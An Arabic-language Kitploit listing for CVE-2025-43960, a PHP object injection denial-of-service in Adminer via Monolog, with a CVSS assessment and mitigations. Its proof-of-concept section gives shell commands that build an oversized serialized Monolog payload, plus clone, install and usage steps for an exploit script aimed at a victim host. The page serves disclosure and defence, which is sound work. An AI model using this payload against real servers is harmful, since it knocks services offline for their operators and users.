Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-43960 — # استغلال حقن كائنات PHP لـ Adminer <4.8.1 عبر Monolog، مما يسبب رفض الخدمة من خلال حمولات متسلسلة مصممة بعناية. يتضمن إثبات المفهوم (PoC)، وتقييم CVSS، وإرشادات التخفيف. | Kitploit
أدوات/GitHubGitHub/far00t01/cve-2025-43960
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويب
GitHubfar00t01/cve-2025-43960

CVE-2025-43960

# استغلال حقن كائنات PHP لـ Adminer <4.8.1 عبر Monolog، مما يسبب رفض الخدمة من خلال حمولات متسلسلة مصممة بعناية. يتضمن إثبات المفهوم (PoC)، وتقييم CVSS، وإرشادات التخفيف.

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-43960 - حقن كائنات PHP في Adminer < 4.8.1 عبر Monolog - رفض الخدمة (DoS)

بعد أشهر من انتظار الرد من MITRE، حصلت على CVE-2025-43960 بهجوم حقن كائنات PHP ضد خدمة Adminer (<4.8.1)، مما يسبب رفض الخدمة (DoS) من خلال التلاعب بالذاكرة.

https://github.com/user-attachments/assets/ebf7d8e8-01db-4d02-bb12-33321c749458

ملخص

تسمح هذه الثغرة الأمنية للمهاجمين غير المصادق عليهم عن بُعد باستغلال نسخ Adminer 4.8.1 التي تستخدم Monolog، مما يتسبب في رفض الخدمة (DoS) من خلال حقن كائنات PHP. لا يتطلب ناقل الهجوم أي مصادقة أو تفاعل من المستخدم، مما يجعله مشكلة عالية الخطورة (CVSS 7.5) مع إمكانية الارتقاء إلى 8.6 في بعض البيئات المشتركة.

الوصف المقترح

يسمح Adminer 4.8.1، عند استخدام Monolog لتسجيل السجلات، برفض الخدمة (استهلاك الذاكرة) عبر حمولة تسلسلية مصممة مثل تلك التي تحتوي على سلسلة s:1000000000، وهو ما يُعرف بمشكلة حقن كائنات PHP. تؤثر الثغرة على نسخ Adminer التي تستخدم Monolog لتسجيل السجلات، حيث يتم إلغاء تسلسل إدخال المستخدم غير الموثوق دون تحقق مناسب. من خلال إرسال كائن كبير مُلغى التسلسل، يمكن للمهاجم فرض استهلاك عالٍ للذاكرة، مما يجعل واجهة Adminer غير مستجيبة ويتسبب في رفض خدمة على مستوى الخادم.

  • بينما قد يتعافى الخادم بعد عدة دقائق، يمكن أن تتسبب الطلبات المتزامنة المتعددة في انهيار كامل، مما يتطلب تدخلًا يدويًا لاستعادة الخدمة.

درجة CVSS v3.1

الدرجة الأساسية: 7.5 (عالية)
المتجه: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

ملاحظة حول حالات النشر المحددة:

إذا كان انهيار Adminer يعطل أيضًا خدمات/مستأجرين آخرين (مثل حاوية أو عملية مشتركة)، فقد ينطبق النطاق: متغير (Scope: Changed):

  • المتجه: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • الدرجة: 8.6 (عالية)

معلومات إضافية

إجراءات التخفيف المحتملة

  • تجنب استخدام unserialize() على البيانات غير الموثوقة داخل Adminer وMonolog.
  • فرض حدود الذاكرة (memory_limit) في PHP لمنع الاستهلاك المفرط للموارد.
  • استخدم allowed_classes في unserialize() لتقييد إلغاء تسلسل الفئات غير المصرح بها.

مورّد المنتج

  • Adminer

قاعدة كود المنتج المتأثر

  • Adminer < 4.8.1 (أحدث إصدار مستقر وقت الاختبار)

المكوّن المتأثر

  • تكامل Monolog في Adminer

الميزة الإشكالية

  • حقن كائنات PHP عبر unserialize()

المنطقة المحتمل تأثرها

  • أي نسخة Adminer حيث يتم استخدام تسجيل السجلات المعتمد على Monolog

إثبات المفهوم (PoC)

توليد الحمولة:

root@kitploit:~
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
root@kitploit:~
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt

الأثر:

  • يدخل الخادم في حالة تحميل، مما يجعل Adminer غير قابل للوصول.
  • تختفي الواجهة الأمامية تمامًا أثناء تنشيط الاتصال.
  • عند توقف الهجوم، يتعافى الخادم بعد بضع دقائق ما لم يتم استخدام أجهزة متعددة (سيناريو DDoS).

متطلبات التثبيت

  • Python: تأكد من تثبيت Python 3.x. يمكنك التحقق من ذلك بتشغيل python3 --version في الطرفية.

تبعيات Python

  • Flask: يُستخدم لتشغيل خادم HTTP المحلي الذي يقدم الحمولة.
  • requests: يُستخدم للتفاعل مع التطبيق المستهدف أثناء عملية الاستغلال.

التثبيت

root@kitploit:~
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960 
pip install -r requirement.txt
python3 cve-2025-43960.py

استخدام الاستغلال:

root@kitploit:~
python3 cve-2025-43960.py 

Usage: cve-2025-43960.py <ip-listener> <port-listener> <ip-victim:port>
Example: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000

المراجع

  • https://www.adminer.org
  • https://github.com/vrana/adminer
  • https://github.com/Seldaek/monolog
  • https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
  • https://cwe.mitre.org/data/definitions/502.html
  • https://cwe.mitre.org/data/definitions/400.html
  • https://cwe.mitre.org/data/definitions/789.html

المكتشف

Fabian Rosales (@far00t01) Medium.

تنزيل الأداة